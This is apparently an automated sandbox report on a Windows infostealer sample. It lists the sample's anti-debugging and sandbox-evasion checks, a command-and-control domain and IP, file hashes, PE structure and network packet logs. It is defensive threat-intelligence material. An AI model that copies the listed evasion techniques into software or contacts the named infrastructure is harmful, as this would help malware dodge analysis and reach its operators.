Source: ZN34wF8WI2.exe, 00000005.00000003.1307940192.0000000006A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: ZN34wF8WI2.exe, 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ZN34wF8WI2.exe, 00000005.00000002.1416988934.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1395398703.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1394903835.0000000001A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile opened: NTICE
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile opened: SICE
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_005F9980 rdtsc 5_2_005F9980
Source: ZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: V;Program Manager
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: procmon.exe
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 91.149.241.220:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ZN34wF8WI2.exe47%ReversingLabsWin32.Infostealer.Tinba
ZN34wF8WI2.exe51%VirustotalBrowse
ZN34wF8WI2.exe100%AviraTR/Crypt.TPM.Gen
ZN34wF8WI2.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a10%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah0%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb180%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377380%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=00%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZ0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fortth14vs.top
91.149.241.220
truefalse
    		high
    httpbin.org
    		34.197.122.172
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
          		high
          http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1ZN34wF8WI2.exe, 00000005.00000002.1416710655.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1395528056.00000000019C7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://html4/loose.dtdZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#ZN34wF8WI2.exefalse
              		high
              https://httpbin.org/ipbeforeZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
                		high
                http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://curl.se/docs/http-cookies.htmlZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
                  		high
                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/hsts.html#ZN34wF8WI2.exefalse
                    		high
                    http://home.fortth14vs.top/gduZZN34wF8WI2.exe, 00000005.00000003.1394903835.0000000001A36000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/alt-svc.htmlZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
                      		high
                      http://.cssZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
                        		high
                        http://.jpgZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          91.149.241.220
                          		home.fortth14vs.topPoland
                          		41952MARTON-ASPLfalse
                          34.197.122.172
                          		httpbin.orgUnited States
                          		14618AMAZON-AESUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1582693
                          Start date and time:2024-12-31 09:43:09 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 9s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:ZN34wF8WI2.exe
                          renamed because original name is a hash value
                          Original Sample Name:e08249e8fc2ed51351908219f021fb0e.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@9/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 51%
                          • Number of executed functions: 31
                          • Number of non-executed functions: 52
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          34.197.122.172Set-up.exeGet hashmaliciousUnknownBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            httpbin.orgSet-up.exeGet hashmaliciousUnknownBrowse
                            • 52.202.253.164
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 52.73.63.247
                            a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                            • 34.226.108.155
                            TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                            • 3.218.7.103
                            FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            MARTON-ASPLmips.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            ppc.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            mpsl.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            arm5.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            arm7.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            harm4.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            harm5.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            harm4.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            nshsh4.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            nsharm5.elfGet hashmaliciousUnknownBrowse
                            • 91.149.238.18
                            AMAZON-AESUSPO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                            • 44.221.84.105
                            http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                            • 44.199.56.69
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 52.202.253.164
                            kwari.mips.elfGet hashmaliciousUnknownBrowse
                            • 54.226.65.111
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                            • 3.88.121.169
                            https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                            • 3.88.121.169
                            securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                            • 44.219.110.92
                            https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                            • 3.208.228.173
                            botx.mips.elfGet hashmaliciousMiraiBrowse
                            • 52.0.196.218

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.986074258037828
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:ZN34wF8WI2.exe
                            File size:4'464'640 bytes
                            MD5:e08249e8fc2ed51351908219f021fb0e
                            SHA1:c8e88594280d1f80feccc811bed7ce03eda5286b
                            SHA256:36203748faebc1b01f1450c5b93bd31d21b9f98d1e5df663f8a5451c4553dc71
                            SHA512:d0176fb22ee4b264d12e271a90cc5aff9eb1727dc6e3bb49c58a2cd9089ef820b8722d1e98851f4a8cbf60319a109cb5a8e01215a67b9015eaa7db017b9aaecb
                            SSDEEP:98304:5mSFzucnvyDVgsQ6eYk4T/sZ8qcOhdbWwI1l7JusApT1A4:YSFz7n6pgke+T0Z8neBI1XuNxA
                            TLSH:682633614DB9EA44C9DDADB2D42B434B52AC7B533FC18AF9ED0A86B148E7305D81A1F0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...@........M...@..........................p........D...@... ............................

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x1094000
                            Entrypoint Section:.taggant
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                            DLL Characteristics:DYNAMIC_BASE
                            Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Authenticode Signature

                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:

                                Entrypoint Preview

                                Instruction
                                jmp 00007F7621184D2Ah
                                paddd mm0, qword ptr [ebx+00h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007F7621186D25h
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74c05f0x73.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x74b0000x2b0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x7782000x688
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc9218c0x10aapkfxsh
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0xc9213c0x18aapkfxsh
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x74a0000x2890004132eef566095335e7d533986236b1a4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x74b0000x2b00x200fbf6fe89e64c21304118a948f5956cebFalse0.802734375data6.0138918115720985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x74c0000x10000x20052564c2cea63394dbc4e71775ebabcc0False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x74d0000x3900000x20019ccc0bb8b28f79a0df3115bc41d11b0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                aapkfxsh0xadd0000x1b60000x1b5400d511a8ecf937bd6f380fb63a80591e21False0.9946660368424814data7.956229076953652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ucrzewim0xc930000x10000x400afdf469fac5895a9a7881d4d9e80d19bFalse0.8115234375data6.316084893218518IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0xc940000x30000x22001aff23d79b15f2d6dabf881ed68f25e9False0.057904411764705885DOS executable (COM)0.7898215980504367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0xc9219c0x256ASCII text, with CRLF line terminators0.5100334448160535

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 09:44:09.794188023 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:09.794224977 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:09.794470072 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:09.808217049 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:09.808228970 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.462610960 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.474524021 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:10.474549055 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.476196051 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.476253033 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:10.498524904 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:10.498614073 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.498732090 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:10.498739958 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.544048071 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:10.602123022 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.602255106 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:10.602313042 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:10.613176107 CET49704443192.168.2.734.197.122.172
                                Dec 31, 2024 09:44:10.613198996 CET4434970434.197.122.172192.168.2.7
                                Dec 31, 2024 09:44:13.543690920 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:13.548599958 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.548707008 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:13.549916983 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:13.555022955 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555036068 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555044889 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555053949 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555063963 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555073023 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555082083 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555088997 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555097103 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555102110 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.555141926 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:13.555217981 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:13.560059071 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.560070992 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.560101986 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:13.560111046 CET804970591.149.241.220192.168.2.7
